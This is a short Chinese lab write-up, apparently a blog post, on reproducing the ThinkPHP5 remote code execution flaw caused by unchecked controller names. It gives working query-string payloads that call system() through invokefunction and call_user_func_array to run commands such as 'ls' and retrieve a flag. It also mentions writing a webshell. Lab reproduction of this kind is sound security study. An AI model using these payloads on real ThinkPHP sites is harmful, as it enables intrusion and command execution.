描述
ThinkPHP框架 - 是由上海顶想公司开发维护的MVC结构的开源PHP框架,遵循Apache2开源协议发布,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。
ThinkPHP5 存在远程代码执行漏洞。该漏洞由于框架对控制器名未能进行足够的检测,攻击者利用该漏洞对目标网站进行远程命令执行攻击。
复现
1.打开靶场环境

2.构造payload远程代码执行,在地址后边添加路径与参数就行,然后在/tmp下获得flag
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=想要输入的命令
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20

本文探讨了ThinkPHP5存在的远程代码执行漏洞,该漏洞源于控制器名的检测不足,允许攻击者通过特定payload执行任意系统命令。攻击者可以利用此漏洞获取敏感信息,如在靶场环境中通过构造不同的payload进行命令执行,包括读取文件和写入一句话木马。为防止此类攻击,开发者需要及时更新和加固框架,确保应用的安全性。
最低0.47元/天 解锁文章
1803

被折叠的 条评论
为什么被折叠?



